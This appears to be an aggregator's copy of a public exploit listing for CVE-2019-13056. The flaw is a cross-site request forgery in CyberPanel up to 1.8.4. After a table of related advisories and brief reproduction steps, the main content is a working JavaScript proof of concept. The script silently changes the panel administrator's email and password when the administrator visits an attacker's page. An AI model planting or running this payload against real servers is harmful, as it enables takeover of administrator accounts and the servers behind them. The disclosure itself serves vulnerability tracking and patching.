CyberPanel 1.8.4 - Cross-Site Request Forgery Vulnerability

🗓️ 02 Jul 2019 00:00:00Reported by Bilgi Birikim SistemleriType

zdt🔗 0day.today👁 113 Views

CyberPanel 1.8.4 CSRF Vulnerabilit

Reporter	Title	Published	Views	Family All 11
CNVD	CyberPanel Cross-Site Request Forgery Vulnerability	2 Jul 201900:00	–	cnvd
CVE	CVE-2019-13056	2 Jul 201915:18	–	cve
Cvelist	CVE-2019-13056	2 Jul 201915:18	–	cvelist
Exploit DB	CyberPanel 1.8.4 - Cross-Site Request Forgery	1 Jul 201900:00	–	exploitdb
EUVD	EUVD-2019-4616	7 Oct 202500:30	–	euvd
exploitpack	CyberPanel 1.8.4 - Cross-Site Request Forgery	1 Jul 201900:00	–	exploitpack
NVD	CVE-2019-13056	2 Jul 201916:15	–	nvd
OSV	CVE-2019-13056	2 Jul 201916:15	–	osv
Packet Storm	CyberPanel 1.8.4 Cross Site Request Forgery	1 Jul 201900:00	–	packetstorm
Prion	Cross site request forgery (csrf)	2 Jul 201916:15	–	prion

# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# [email protected] & bilgibirikim.com

# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and takeover the server.
# A CSRF vulnerability.

# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.

# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"[email protected]","password":"attackerspassword"}'});
</script>

#  0day.today [2019-07-03]  #

02 Jul 2019 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.00216